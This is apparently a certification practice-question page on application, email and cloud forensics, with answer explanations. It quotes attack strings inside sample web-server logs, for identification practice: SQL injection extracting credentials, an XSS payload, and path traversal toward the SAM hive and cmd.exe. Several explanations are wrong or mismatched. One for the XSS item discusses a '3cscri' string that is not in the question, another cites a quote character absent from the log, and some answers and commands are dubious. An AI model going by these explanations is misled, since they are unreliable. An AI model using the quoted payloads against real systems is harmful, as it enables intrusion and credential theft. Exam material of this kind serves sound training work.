Courseiva

CCNA Application, Email and Cloud Forensics Questions

75 of 113 questions · Page 1/2 · Application, Email and Cloud Forensics · Answers revealed

1
MCQmedium

An investigator examining a compromised web server finds a file named shell.aspx in the uploads directory. The file contains code that accepts commands via HTTP POST and executes them on the server. What is the MOST likely type of attack?

A.Server-side request forgery (SSRF)
B.SQL injection
C.Webshell
D.Cross-site request forgery (CSRF)
AnswerC

A webshell is a script uploaded to a web server that accepts commands over HTTP and executes them on the host, giving the attacker remote control. The .aspx extension and POST-based command execution match this pattern exactly.

Why this answer

The file shell.aspx contains code that accepts commands via HTTP POST and executes them on the server, which is the classic definition of a webshell. A webshell is a malicious script uploaded to a web server that provides an attacker with remote command execution capabilities, often used for persistence and post-exploitation activities.

Exam trap

EC-Council often tests the distinction between attacks that involve direct server-side code execution (webshell) versus attacks that manipulate other systems or users (SSRF, CSRF) or exploit database layers (SQL injection), so candidates must focus on the presence of an uploaded executable script file.

How to eliminate wrong answers

Option A is wrong because Server-Side Request Forgery (SSRF) involves the server making requests to internal or external resources on behalf of the attacker, not executing arbitrary commands via a file in the uploads directory. Option B is wrong because SQL injection exploits vulnerabilities in database queries, not the execution of system commands through an uploaded script file. Option D is wrong because Cross-Site Request Forgery (CSRF) tricks a user's browser into performing unintended actions on a trusted site, not directly executing commands on the server via an uploaded file.

2
MCQeasy

Which tool is specifically designed for parsing and analyzing email headers to trace the origin of an email and detect spoofing?

A.Wireshark
B.EnCase
C.Nmap
D.EmailTrackerPro
AnswerD

EmailTrackerPro is purpose-built for email header analysis and spoofing detection: it automatically parses the complete RFC 5322 header of a suspicious message, reconstructs the delivery path from Received headers, and pinpoints the originating IP address using WHOIS/GeoIP lookup. It also cross-references the message against SPF, DKIM, and DMARC authentication results to expose forged sender information or unauthorized relaying, which is exactly the specialized functionality required for this task.

Why this answer

EmailTrackerPro is specifically designed to parse email headers, extract routing information, and trace the path an email took from sender to recipient. It analyzes fields like Received, Message-ID, and Authentication-Results to detect spoofing, forging, or relay anomalies, making it the correct tool for this task.

Exam trap

EC-Council CHFI often tests the distinction between network-level tools (Wireshark, Nmap) and application-level forensic tools (EmailTrackerPro), expecting candidates to recognize that email header analysis requires a specialized parser, not a generic packet sniffer.

How to eliminate wrong answers

Option A is wrong because Wireshark is a network packet analyzer that captures live traffic at the packet level, not a tool for parsing stored email headers or tracing email origin. Option B is wrong because EnCase is a forensic imaging and analysis suite for disk and file system forensics, not designed for email header parsing or spoofing detection. Option C is wrong because Nmap is a network scanning tool used for port discovery and service enumeration, not for analyzing email headers or tracing email routes.

3
MCQmedium

A security analyst reviews an Apache access log and finds the entry: '192.168.1.10 - - [10/Mar/2025:08:12:34 +0000] "GET /index.php?id=1 UNION SELECT username,password FROM users-- HTTP/1.1" 200 2345 "-" "Mozilla/5.0"'. Which attack is indicated?

A.Cross-site scripting (XSS)
B.SQL injection
C.Path traversal
D.Webshell upload
AnswerB

The UNION SELECT clause visible in the access log is a classic signature of UNION-based SQL injection. An attacker injects this clause to merge a legitimate query with an arbitrary SELECT statement, allowing retrieval of data from unrelated tables, such as user credentials or payment records. This technique is specifically designed to manipulate the database query structure rather than client-side content, file paths, or upload endpoints, making it the only answer that matches the observed log evidence.

Why this answer

The UNION SELECT statement in the URI indicates a SQL injection attack. The attacker is trying to extract data from the database.

4
MCQmedium

During an email forensics investigation, an analyst examines headers and sees `Received: from mail.evil.com (192.168.1.100) by mail.victim.com` followed by `DKIM-Signature: v=1; a=rsa-sha256; d=evil.com; s=selector; bh=...; h=...; b=...`. The email claims to be from support@paypal.com. Which finding is the strongest indicator of spoofing?

A.The email was received via SMTP
B.The email lacks a SPF record in the header
C.The email originated from IP 192.168.1.100
D.The DKIM signature domain is evil.com, not paypal.com
AnswerD

A valid DKIM signature verified under the domain 'evil.com' while the From header claims 'paypal.com' is a definitive spoofing indicator. The 'd=' tag in the DKIM signature identifies which domain's private key signed the message, and Paypal's private key is cryptographically inaccessible to an attacker. Under DMARC alignment, the signing domain must match the From domain (or be an organizational parent), so this mismatch proves the message was not authorized by Paypal and is a direct sign of forgery, much stronger than SMTP or SPF observations.

Why this answer

The DKIM signature domain (d=evil.com) does not match the claimed sender domain (paypal.com). DKIM uses a digital signature verified against the public key published in the DNS of the signing domain. Since the signature is from evil.com, the email cannot be authenticated as originating from paypal.com, making this the strongest indicator of spoofing.

Exam trap

EC-Council CHFI often tests the distinction between authentication mechanisms (SPF, DKIM, DMARC) and the specific meaning of DKIM's 'd=' tag, trapping candidates who think any missing authentication header or a private IP alone is the strongest spoofing indicator.

How to eliminate wrong answers

Option A is wrong because SMTP is the standard protocol for email transmission and does not itself indicate spoofing; almost all emails are received via SMTP. Option B is wrong because the absence of an SPF record in the header does not directly prove spoofing—SPF may not be published or checked, and the header shown does not include an SPF result. Option C is wrong because the IP 192.168.1.100 is a private RFC 1918 address, which is non-routable on the public internet; its presence in a Received header often indicates internal relay or header manipulation, but it is not as definitive as the DKIM domain mismatch.

5
MCQhard

An analyst discovers a suspicious file named 'cmd.aspx' in the web root of an IIS server. The file contains ASPX code that executes system commands. The IIS logs show a POST request to '/cmd.aspx' with a 200 status code. Which type of attack is indicated?

A.Webshell upload
B.SQL injection
C.Cross-site scripting (XSS)
D.Directory traversal
AnswerA

The .aspx extension indicates an ASP.NET server-side script that executes within the IIS worker process. A file named cmd.aspx typically contains C# code that calls System.Diagnostics.Process to spawn system commands, effectively giving an attacker interactive command-line access over HTTP. Its presence in the web root without a correlated legitimate upload points to an uploaded webshell, not an attack that injects ephemeral code or manipulates path parameters.

Why this answer

The presence of a file named 'cmd.aspx' in the IIS web root that executes system commands, combined with a POST request returning a 200 status code, indicates a webshell upload attack. An attacker has uploaded an ASPX file that acts as a backdoor, allowing remote command execution via HTTP POST requests, which is a classic webshell scenario.

Exam trap

In CHFI, candidates often confuse webshell upload with directory traversal, mistakenly thinking the POST request to an existing file indicates traversal rather than recognizing the uploaded executable payload.

How to eliminate wrong answers

Option B is wrong because SQL injection involves manipulating SQL queries through input fields, not uploading executable files to the web root. Option C is wrong because cross-site scripting (XSS) injects client-side scripts into web pages viewed by other users, not server-side command execution via an uploaded file. Option D is wrong because directory traversal exploits path manipulation to access files outside the web root, not the upload and execution of a command shell file within the web root.

6
MCQeasy

In the context of cloud forensics, what is the primary challenge associated with volatile evidence in Infrastructure as a Service (IaaS) environments?

A.Evidence can be lost when the cloud instance is stopped or terminated
B.Evidence may be stored across multiple jurisdictions
C.Encryption of data at rest prevents access to evidence
D.Cloud providers may not allow forensic investigators to access the physical hardware
AnswerA

Stopping or terminating a cloud instance clears volatile memory (RAM), which contains running processes, open network connections, kernel objects, and other live forensic evidence that exists only while the OS is executing. Unlike persistent block storage, this in-memory state is not captured by ordinary disk snapshots, and recovery becomes impossible once the hypervisor reclaims the memory pages. Therefore, forensic investigators must acquire memory before shutdown using live acquisition techniques or pre-configured collection mechanisms, making this the primary volatility-specific challenge.

Why this answer

Volatile evidence such as memory and running processes disappears when an instance is stopped or terminated, making timely acquisition critical.

7
MCQeasy

An analyst finds the following string in an IIS log: %3Cscript%3Ealert('XSS')%3C/script%3E. What does this indicate?

A.A cross-site scripting (XSS) attempt
B.A SQL injection attempt
C.A buffer overflow attempt
D.A path traversal attempt
AnswerA

The string 3cscri is a signature of an XSS attempt because 3c is the hexadecimal encoding of the ASCII character '<', and 'scri' is the beginning of the word 'script'. When decoded, this represents the start of an HTML/JavaScript payload such as <script>, which would execute in a victim's browser. IIS logs often capture URL-encoded or hex-encoded characters, so this observed fragment strongly indicates cross-site scripting rather than any other web attack.

Why this answer

The string is URL-encoded HTML/JavaScript (<script>alert('XSS')</script>). It is a typical cross-site scripting payload attempting to execute in a browser.

8
MCQmedium

During a forensic investigation of a compromised web server, an analyst examines the Apache access log and finds the following entry: '192.168.1.10 - - [12/Oct/2024:13:45:22 +0000] "GET /index.php?id=1 UNION SELECT username, password FROM users-- HTTP/1.1" 200 1234 "-" "Mozilla/5.0"'. What type of attack is MOST likely indicated?

A.Cross-site scripting (XSS)
B.SQL injection (SQLi)
C.Path traversal
D.Remote file inclusion (RFI)
AnswerB

The GET request to the id parameter with ' UNION SELECT username,password FROM users -- is a textbook UNION-based SQL injection payload. The single quote closes the original SQL string, UNION SELECT appends attacker-controlled columns to the result set, and the '--' comment sequence comments out the remainder of the original WHERE clause so the query executes exactly as the attacker intends. This causes the application's database to return records (e.g., credentials) that should never be exposed, making SQL injection the correct classification.

Why this answer

The log entry shows a UNION-based SQL injection attempt, where the attacker appends 'UNION SELECT username, password FROM users--' to the 'id' parameter in the GET request. This manipulates the original SQL query to return sensitive data from the 'users' table, which is the hallmark of SQL injection (SQLi). The HTTP 200 response indicates the query executed successfully, confirming the attack vector.

Exam trap

The trap here is that candidates may confuse the 'UNION SELECT' syntax with a path traversal or RFI attack because they see a URL parameter with special characters, but the key indicator is the SQL-specific command structure, not file paths or remote URLs.

How to eliminate wrong answers

Option A is wrong because cross-site scripting (XSS) involves injecting client-side scripts (e.g., JavaScript) into web pages viewed by other users, not manipulating SQL queries via URL parameters; the log shows no script tags or event handlers. Option C is wrong because path traversal attacks use '../' sequences to access files outside the web root (e.g., /etc/passwd), not SQL syntax like 'UNION SELECT'. Option D is wrong because remote file inclusion (RFI) involves including a remote file (e.g., via 'http://evil.com/shell.txt') in a server-side include or function, not injecting SQL commands into a database query.

9
MCQhard

During a forensic investigation of a Google Cloud Platform (GCP) environment, an analyst reviews Audit Logs and sees a log entry with the method 'storage.objects.list' and a principal email 'attacker@gmail.com'. However, the identity is not from the organization's domain. What should the analyst conclude?

A.The analyst must immediately shut down the bucket.
B.The attacker spoofed the principal email in the log.
C.An external identity was granted IAM permissions on the bucket, possibly through a misconfigured resource.
D.The log entry is a false positive due to a logging error.
AnswerC

The presence of an external email address in the principal field of the Cloud Audit Log entry indicates that an IAM policy binding grants permissions to an identity outside the organization. This often happens when a bucket has been made public or when a resource-level IAM policy accidentally includes an external user or allUsers/allAuthenticatedUsers. The analyst should examine the bucket's IAM policy using `gcloud iam policies get` or the Cloud Console to identify the exact binding.

Why this answer

In GCP, Audit Logs record the actual identity used to authenticate the API call. The presence of 'attacker@gmail.com' as the principal email indicates that an external Google account (not part of the organization's domain) was granted IAM permissions on the bucket, likely through a misconfigured resource policy (e.g., a bucket-level IAM policy that allows allUsers or a specific external user). This is a common cloud security misconfiguration where overly permissive IAM bindings are applied.

Exam trap

EC-Council often tests the misconception that Audit Logs can be spoofed or that external identities cannot appear in logs unless there is a logging error, but the correct understanding is that GCP Audit Logs faithfully record the authenticated identity, and an external email indicates a real IAM permission grant.

How to eliminate wrong answers

Option A is wrong because immediately shutting down the bucket is a reactive, non-forensic action that could destroy evidence; the analyst should first verify the scope of the misconfiguration and preserve logs. Option B is wrong because GCP Audit Logs are generated by the Cloud Audit Logs service and the principal email is extracted from the authenticated identity token (OAuth 2.0 or JWT) — spoofing the principal email would require compromising the authentication mechanism, which is not feasible for an external attacker. Option D is wrong because Audit Logs are tamper-proof and generated by the GCP infrastructure; a logging error that introduces a specific external email is extremely unlikely and would be a systemic issue, not a one-off false positive.

10
MCQmedium

Which of the following is a primary challenge in cloud forensics due to shared infrastructure?

A.Slow internet speeds
B.Multi-tenancy and data comingling
C.Lack of logging capabilities
D.Inability to perform network analysis
AnswerB

Multi-tenancy and data comingling are a primary challenge because cloud infrastructure pools resources across many customers on shared physical hardware. When an investigator acquires a forensic image from a virtual disk or memory, the underlying storage may contain remnants or interleaved blocks from other tenants, making it difficult to isolate the target's data without cross-contamination. This threatens chain of custody, requires careful logical isolation verification, and raises significant privacy and legal issues because collecting other tenants' data may violate statutes or service agreements. The shared responsibility model complicates attribution further, as the investigator must prove that the evidence belongs solely to the suspected tenant.

Why this answer

Multi-tenancy means multiple customers share the same physical resources. This complicates evidence isolation and can lead to data comingling, making forensic acquisition difficult.

11
Multi-Selectmedium

A security analyst notices repeated entries in an IIS log: 10.0.0.2, -, 05/Feb/2023:08:12:34 +0000, GET /../../windows/system32/config/sam, 404, 0, 532. Which TWO of the following attack types are indicated by this log entry?

Select 2 answers
A.SQL injection
B.Directory traversal
C.Privilege escalation attempt
D.Denial of service
E.Cross-site scripting
AnswersB, C

The repeated '../' sequences, often encoded as '%2e%2e%5c' or '%2e%2e/', are classic indicators of directory traversal in IIS logs. An attacker sends these sequences to escape the web root and access sensitive files outside it, such as Windows system files or configuration stores. The log entries show a deliberate attempt to navigate the server's directory hierarchy, which is the defining characteristic of a directory traversal attack.

Why this answer

The use of '../' indicates path traversal, and the target file (SAM) is a common target for privilege escalation.

12
MCQhard

A forensic analyst is examining a Docker container that was used to launch a DDoS attack. Which layer of a Docker image is most likely to contain the attacker's malicious scripts?

A.The overlay filesystem layer
B.The topmost writable container layer
C.The volume mounted from the host
D.The base image layer
AnswerB

The topmost writable container layer, also called the 'container layer' or 'upperdir' in overlayfs terms, is where all runtime modifications are recorded. When a container creates, deletes, or alters files, those changes are written here using copy-on-write, making it the primary location for malicious scripts planted during execution. This layer is ephemeral and typically destroyed with the container unless it is explicitly preserved via docker commit or docker export, so forensic collection must target this layer for runtime tampering.

Why this answer

Docker images consist of read-only layers. The topmost writable layer (container layer) holds changes made at runtime, such as installing tools or scripts. The attack scripts would be in this layer.

13
MCQmedium

During a forensic investigation of a compromised web server, you find the following entry in the IIS log: 192.168.2.50, -, 10/Jan/2023, 14:32:15, W3SVC1, WEB01, 192.168.2.10, 80, POST, /uploads/shell.aspx, 200, 0, 0, 513, 0, Mozilla/4.0. Which action should the investigator prioritize?

A.Rebuild the web server from a clean backup
B.Analyze the uploaded shell.aspx file for malicious content
C.Delete the shell.aspx file immediately
D.Check the web server's firewall logs for the attacker's IP
AnswerB

Analyzing the uploaded shell.aspx file is the most direct and probative step because it's an active web shell that confirms a successful exploitation and defines the attacker's capabilities. Static analysis (e.g., extracting strings, decoding obfuscated payloads) and dynamic analysis in a sandbox reveal command-and-control channels, file exfiltration methods, and any additional backdoors the shell installs. This knowledge is essential for both attribution and full remediation.

Why this answer

The IIS log entry shows a successful POST (HTTP 200) to /uploads/shell.aspx, which is a classic indicator of a web shell upload. The investigator's priority is to analyze the uploaded file to determine its capabilities, persistence mechanisms, and any data exfiltration or lateral movement it may have enabled. This aligns with forensic best practices: preserve and examine the artifact before taking remediation steps.

Exam trap

EC-Council often tests the misconception that immediate remediation (deletion or rebuild) is the correct first step, but forensic methodology demands artifact preservation and analysis before any destructive action.

How to eliminate wrong answers

Option A is wrong because rebuilding the server from a clean backup destroys volatile evidence (e.g., the shell.aspx file, memory artifacts, and recent log entries) before analysis is complete, violating forensic preservation principles. Option C is wrong because deleting the shell.aspx file immediately destroys the primary artifact needed for attribution, reverse engineering, and understanding the attacker's methods; it also does not address potential persistence mechanisms like scheduled tasks or registry modifications. Option D is wrong because the attacker's IP (192.168.2.50) is already present in the IIS log, and firewall logs may not provide additional actionable information at this stage; the priority is to analyze the uploaded payload, not to chase an IP that could be spoofed or a proxy.

14
MCQeasy

Which tool is specifically designed to analyze email headers and track the path of an email across multiple servers?

A.Aid4Mail
B.EmailTracker
C.Wireshark
D.FTK Imager
AnswerB

EmailTracker is a purpose-built utility for parsing email message headers and reconstructing the delivery path from sender to recipient. It extracts each Received: header, maps the originating IP address, identifies intermediary mail servers and time zones, and surfaces anomalies such as forged headers or mismatches among SPF, DKIM, and DMARC results. This automated route visualization is exactly what 'analyzing email headers' means in an investigative context.

Why this answer

EmailTracker is a web-based tool that parses email headers and visualizes the route. Aid4Mail is for forensic acquisition/analysis. Wireshark captures network packets.

FTK Imager is for disk imaging.

15
MCQmedium

An analyst examining an Outlook PST file wants to recover deleted emails that are no longer visible in the Deleted Items folder. Which technique is MOST effective?

A.Convert the PST to an EDB file and mount it
B.Repair the PST file using Scanpst.exe
C.Reconstruct the PST from the Exchange server backup
D.Use a forensic tool to carve for deleted items within the PST
AnswerD

Forensic carving scans the raw PST byte stream for known message property tags, signature patterns, and header structures that remain in unallocated blocks after logical deletion. Because deleting an item typically only marks its B-tree entries as free rather than scrubbing the underlying data, tools can reassemble deleted emails directly from the PST's free space and slack. This bypasses the file's logical index, which is exactly why it is the only listed option capable of recovering permanently deleted items.

Why this answer

Deleted emails in PST files are often not immediately overwritten. Using forensic tools to scan the PST file for unallocated space or deleted items can recover them.

16
Multi-Selectmedium

A security analyst is investigating a phishing email and notices the DKIM-Signature header is present but fails validation. Which TWO actions should the analyst take?

Select 2 answers
A.Ignore the DKIM failure as it is not important
B.Check the DKIM DNS record for the signing domain
C.Reply to the sender to verify authenticity
D.Examine the Received headers for spoofing clues
E.Delete the email immediately
AnswersB, D

The correct forensic step is to query the DNS TXT record for the selector and signing domain using tools like dig or nslookup, then use that public key to cryptographically verify the DKIM signature in the email headers. If the key is missing, expired, or does not match, this confirms the failure is due to a real spoofing attempt or misconfiguration. This validation is objective and reproducible, unlike replying or deleting evidence.

Why this answer

DKIM failure indicates the email may be forged or tampered with. Checking the domain's DKIM DNS record and examining the email headers for other spoofing indicators are appropriate steps.

17
Multi-Selectmedium

An investigator is analyzing email headers and notices the following: The 'Received' headers show a path through multiple servers, the 'DKIM-Signature' domain matches the sender domain, and 'X-Originating-IP' is present. Which TWO pieces of information are MOST useful to trace the original sender's IP address? (Choose two.)

Select 2 answers
A.The 'Message-ID' header
B.The 'From' header email address
C.The DKIM-Signature's 'd=' domain
D.The X-Originating-IP header value
E.The last (bottommost) Received header's IP
AnswersD, E

The X-Originating-IP header records the IP the sending client supplied at submission, often surviving forwarding that rewrites Received chains. Where present and unspoofed, it exposes the originating host directly, satisfying the stem's need to trace the original sender's IP rather than intermediate relays.

Why this answer

The X-Originating-IP header (D) is the most direct artifact for tracing the sender, because it is typically inserted by the originating webmail or client and records the actual public IP address from which the message was submitted. The bottommost Received header (E) is also critical, since Received headers are prepended as the message traverses each hop, so the last (bottommost) entry reflects the earliest server that accepted the message and its connecting IP, which is closest to the true origin. Together, D and E let an investigator correlate the claimed client IP with the first-hop server's observed source address.

The Message-ID (A) is only a unique identifier generated by the sending system and contains no routable IP information. The From header (B) is trivially spoofable and only shows a claimed address, not the transmission source. The DKIM-Signature d= domain (C) identifies the signing domain for authentication but does not reveal the sender's IP address.

Exam trap

EC-Council CHFI often tests the distinction between headers that contain routing information (Received, X-Originating-IP) and those that contain metadata or authentication data (Message-ID, From, DKIM), leading candidates to mistakenly choose headers that are easily forged or unrelated to IP tracing.

18
Multi-Selectmedium

A forensic analyst is examining Azure Activity Logs for signs of privilege escalation. Which TWO of the following activities would be MOST indicative of an attacker attempting to escalate privileges? (Choose two.)

Select 2 answers
A.A user updating their own password
B.Deleting a resource group
C.Creation of a custom RBAC role with Owner permissions
D.Adding a user to the Global Administrator role
E.A user accessing a storage account they own
AnswersC, D

Creating a custom RBAC role with Owner permissions lets an attacker define a bespoke role carrying full control, bypassing detection tuned to built-in role assignments. The Activity Log records the role definition write, revealing deliberate privilege escalation rather than legitimate administrative change.

Why this answer

Option C is correct because creating a custom RBAC role that includes Owner-level permissions (for example, wildcard actions like "*" or "Microsoft.Authorization/*/write") is a classic privilege-escalation technique — the attacker grants themselves or an accomplice full control over a scope without using a built-in role, which is exactly the kind of activity a forensic analyst should flag. Option D is correct because adding a user to the Global Administrator role is a direct, high-impact elevation to the highest privileged directory role in Microsoft Entra ID, granting full control over all Azure subscriptions and tenant resources, and is one of the most reliable indicators of attempted privilege escalation. Option A is not indicative because users changing their own password is a routine self-service action that does not change their authorization level.

Option B is not indicative because deleting a resource group is a destructive/impact action, not an escalation of privileges. Option E is not indicative because accessing a storage account the user already owns is normal, authorized activity within their existing permissions.

Exam trap

EC-Council often tests the distinction between actions that are destructive (like deleting a resource group) versus actions that actually elevate privilege levels (like creating a custom role or adding a user to a high-privilege directory role).

19
Multi-Selectmedium

A Docker container is suspected of malicious activity. Which THREE data sources should the investigator collect for forensic analysis?

Select 3 answers
A.Network packet captures from the container's virtual interface
B.Host system audit logs
C.Docker image layer files
D.Container logs (stdout/stderr)
E.The Dockerfile used to build the image
AnswersB, C, D

Host system audit logs, such as those from auditd, systemd journal, or syslog, are the strongest artifact because the host kernel records container process activity in a way that survives container removal. These logs commonly capture container-ID-tagged process executions, file access, syscalls, and seccomp/AppArmor denials, allowing an investigator to reconstruct the container's interactions with the host. Unlike in-container logs, an attacker who deletes or overwrites files inside the container cannot easily erase the host-side audit trail.

Why this answer

Container logs, image layers, and host system logs are key sources in Docker forensics.

20
MCQhard

During an investigation of a web application breach, an analyst reviews IIS logs and finds numerous entries with status code '200' and URIs containing '?cmd=' followed by encoded strings. The analyst also notices that some requests have a 'User-Agent' string resembling 'Microsoft-CryptoAPI/10.0'. What is the MOST likely conclusion?

A.The logs indicate a successful SQL injection attack
B.The logs show a cross-site scripting (XSS) attack targeting administrators
C.The server is infected with ransomware, encrypting files
D.A webshell is being used to execute commands on the server
AnswerD

The logs indicate a webshell is in use because the HTTP requests contain a cmd parameter whose values are operating-system commands, a classic hallmark of server-side web shells such as China Chopper or b374k. The non-standard User-Agent further suggests a customized or automated attacker tool, and the consistent use of this parameter across requests shows persistent remote access. This behavior is the result of a command injection vulnerability, where the web application fails to sanitize user input before passing it to the system shell, allowing the attacker to execute arbitrary commands directly against the server.

Why this answer

The presence of numerous HTTP 200 (success) responses with URIs containing '?cmd=' followed by encoded strings indicates that an attacker is sending command execution requests to a webshell on the server. The unusual User-Agent string 'Microsoft-CryptoAPI/10.0' is a known evasion technique used by webshell tools (e.g., China Chopper variants) to blend in with legitimate Windows update traffic. Successful command execution returns a 200 status, confirming the webshell is active and under attacker control.

Exam trap

The trap here is that candidates see '200 OK' and assume success of an attack like SQL injection, but the '?cmd=' parameter is the definitive indicator of a command execution webshell. EC-CHFI emphasizes recognizing webshell indicators such as encoded command parameters and unusual User-Agent strings.

How to eliminate wrong answers

Option A is wrong because SQL injection typically results in error codes (e.g., 500) or modified database responses, not consistent 200s with '?cmd=' parameters; the '?cmd=' pattern is characteristic of command execution, not SQL queries. Option B is wrong because XSS attacks inject client-side scripts into web pages and do not produce server-side command execution logs with '?cmd=' URIs; XSS would appear as reflected or stored script payloads in parameters like '?q=' or '?search='. Option C is wrong because ransomware encrypts files locally and communicates with C2 servers, but it does not generate repeated HTTP 200 responses with '?cmd=' in IIS logs; ransomware activity would show unusual file access patterns or encryption API calls, not webshell command execution.

21
Multi-Selectmedium

Which THREE of the following are indicators of a webshell in web server logs? (Select THREE)

Select 3 answers
A.Multiple GET requests to /index.html
B.POST requests to a script file with large payloads
C.Consistent 304 Not Modified responses
D.Requests to unusual script files like cmd.aspx or shell.php
E.A high number of requests from a single IP to a single script
AnswersB, D, E

POST requests to a script file with large payloads strongly suggest webshell activity because attackers use the HTTP body to hide command strings, encoded scripts, or file-upload content from URL-based logging and detection. A legitimate script receiving a large POST body is uncommon, and when combined with an executable extension (.php, .aspx, .jsp), it indicates the attacker is sending instructions or data to be processed by the shell. The large payload size also corresponds to obfuscated command blocks or base64-encoded data, making it a crucial behavioral indicator.

Why this answer

Webshells are indicated by anomalous script files being accessed, POST requests to script files, and high request rates to a single script. These patterns suggest remote access and command execution.

22
MCQmedium

A security analyst reviews Apache access logs and finds the following entry: `192.168.1.10 - - [12/Jul/2024:10:15:30 -0400] "GET /search.php?q=1' UNION SELECT username,password FROM users-- HTTP/1.1" 200 5321 "-" "Mozilla/5.0"`. Which attack technique is most likely being attempted?

A.Remote file inclusion
B.SQL injection
C.Cross-site scripting (XSS)
D.Directory traversal
AnswerB

The presence of UNION SELECT in a query parameter is a classic, definitive indicator of in-band SQL injection. An attacker appends a UNION-based query to the original SQL statement that the application executes against the backend database; if the attacker correctly matches the number and data types of the original query's columns, the database returns the attacker's chosen rows alongside the legitimate results, enabling data exfiltration. This technique operates entirely within the database engine and does not involve remote file loading, client-side script execution, or filesystem path traversal, making the log evidence fully consistent with an automated SQL injection probe.

Why this answer

The log entry shows a GET request to `/search.php?q=1' UNION SELECT username,password FROM users--`. The single quote (`'`) breaks out of the SQL string context, and the `UNION SELECT` clause attempts to retrieve data from the `users` table. This is a classic SQL injection (SQLi) attack targeting the backend database, as the injected SQL syntax is designed to manipulate the query executed by the application.

Exam trap

The trap here is that candidates may confuse the `UNION SELECT` SQL syntax with a file inclusion or XSS payload, but the presence of a single quote and SQL keywords specifically indicates SQL injection, not other web attacks.

How to eliminate wrong answers

Option A is wrong because remote file inclusion (RFI) involves injecting a URL to include a remote file (e.g., via `http://` in a parameter), not SQL syntax like `UNION SELECT`. Option C is wrong because cross-site scripting (XSS) injects client-side scripts (e.g., `<script>`) into the response to execute in a browser, not SQL commands against the database. Option D is wrong because directory traversal uses path sequences like `../` to access files outside the web root, not SQL keywords or quotes.

23
Multi-Selectmedium

In email forensics, which TWO of the following headers are most useful for identifying the true origin of an email? (Select TWO.)

Select 2 answers
A.Message-ID
B.DKIM-Signature
C.X-Originating-IP
D.Received
E.MIME-Version
AnswersC, D

X-Originating-IP is a non-standard header inserted by certain email clients, such as Microsoft Outlook/Exchange, when a message is composed and sent; it contains the raw IP address of the client machine that actually sent the message before it reached a mail server. This header is a direct, valuable starting point in an investigation because it points to the sender's own network connection. However, its presence is client-dependent and it can be absent or forged if the client or a malicious user chooses to omit or modify it.

Why this answer

Received headers show the path and each server's IP, while X-Originating-IP may contain the sender's IP. DKIM verifies integrity but not origin IP. Message-ID is just an identifier.

24
MCQhard

A forensic analyst is investigating a suspected data exfiltration from a MySQL database. Which log source would be MOST useful to identify the exact SQL queries executed, including SELECT statements that retrieved large volumes of data?

A.MySQL error log
B.MySQL binary log
C.MySQL slow query log
D.MySQL general query log
AnswerD

The MySQL general query log captures every SQL statement received by the server—including SELECT, INSERT, UPDATE, and even malformed queries—along with connection events, regardless of how long each query takes. It provides a complete chronological record that an analyst can replay to spot suspicious patterns, such as repeated large-range SELECTs or queries targeting sensitive columns. With log_output set to TABLE, the log can be queried directly, making it the native MySQL mechanism for uncovering data exfiltration via SELECT.

Why this answer

The MySQL general query log records every SQL statement received from clients, including SELECT queries, making it the most useful source for identifying exact queries executed during a suspected data exfiltration. Unlike other logs, it captures all activity without filtering by error, execution time, or data-change events, so it will show the specific SELECT statements that retrieved large volumes of data.

Exam trap

The binary log only logs data-modifying statements (DML) and not read-only SELECTs, leading candidates to incorrectly choose Option B.

How to eliminate wrong answers

Option A is wrong because the MySQL error log only records startup/shutdown events, crashes, and critical errors, not the actual SQL queries executed. Option B is wrong because the MySQL binary log (binlog) only logs statements that change data (INSERT, UPDATE, DELETE, etc.) and does not record SELECT queries, which are read-only and thus not captured. Option C is wrong because the MySQL slow query log only records queries that exceed a defined execution time threshold (e.g., long_query_time), and a data-exfiltration SELECT could be fast and still retrieve large volumes, so it would be missed.

25
MCQmedium

An analyst finds the following in an IIS log: 10.0.0.5, -, 02/15/2024, 14:23:56, GET /../../windows/system32/cmd.exe, 404, 0, 0, 0, Mozilla/4.0. Which attack technique does this log entry represent?

A.Cross-site scripting
B.SQL injection
C.Path traversal
D.Remote code execution
AnswerC

Correct because the raw HTTP request includes ../ in the URL path, which is the classic path traversal pattern that, when decoded or normalized by the server, tries to climb above the web root into restricted directories. In IIS, unencoded or URL-encoded traversal sequences such as %2e%2e%5c can expose system files, and even though the server returned 404, the request itself demonstrates a deliberate traversal attempt against the file-system namespace.

Why this answer

The URI contains ../ patterns attempting to access a system file outside the web root, which is path traversal.

26
MCQeasy

Which cloud service's audit logs would an investigator examine to identify who deleted a virtual machine in an Azure subscription?

A.GCP Audit Logs
B.Azure Activity Log
C.Azure AD Sign-in Logs
D.AWS CloudTrail
AnswerB

The Azure Activity Log records subscription-level control-plane operations, including who deleted a virtual machine, when, and from where. It captures the caller identity and operation name, satisfying the investigator's need to attribute the deletion to a specific principal.

Why this answer

Azure Activity Log (formerly known as Audit Logs or Operational Logs) is the platform-level log that records all control-plane operations for Azure resources, including virtual machine creation, modification, and deletion. When a VM is deleted, the Activity Log captures the caller (user or service principal), the timestamp, the operation name (e.g., 'Microsoft.Compute/virtualMachines/delete'), and the status. An investigator would query the Activity Log to identify who initiated the deletion, making option B correct.

Exam trap

EC-CHFI often tests the distinction between control-plane logs (Activity Log) and authentication logs (Azure AD Sign-in Logs), and the trap here is that candidates confuse Azure AD Sign-in Logs (which show who logged in) with the Activity Log (which shows who performed a resource action), leading them to incorrectly choose option C.

How to eliminate wrong answers

Option A is wrong because GCP Audit Logs are specific to Google Cloud Platform, not Microsoft Azure; they cannot log Azure subscription events. Option C is wrong because Azure AD Sign-in Logs record authentication events (user sign-ins) and application usage, not resource-level operations like deleting a virtual machine; they lack the control-plane action details needed. Option D is wrong because AWS CloudTrail is the audit logging service for Amazon Web Services, not for Azure; it captures API calls in AWS accounts, not Azure subscriptions.

27
MCQeasy

In cloud forensics, one of the major challenges is that data may be stored in multiple jurisdictions with different legal requirements. This challenge is known as:

A.Multi-tenancy
B.Chain of custody
C.Volatile evidence
D.Data jurisdiction
AnswerD

Data jurisdiction is the correct answer because cloud providers routinely replicate and store customer data across multiple geographic regions and legal jurisdictions, often without precise knowledge of the physical location at a given moment. This forces investigators to navigate conflicting national laws, data sovereignty rules, and international legal assistance processes—unlike traditional on-premises forensics where location is fixed. Legal authority to access data may depend on the data's physical or controlling jurisdiction, making this the central challenge in cloud forensics.

Why this answer

Data jurisdiction refers to the legal and regulatory issues that arise when data is stored or processed across different geographic locations with varying laws.

28
Multi-Selecteasy

Which TWO of the following are common challenges specific to cloud forensics?

Select 2 answers
A.Multi-tenancy issues
B.Data jurisdiction
C.Inability to create disk images
D.Permanent data deletion recovery
E.Lack of forensic tools
AnswersA, B

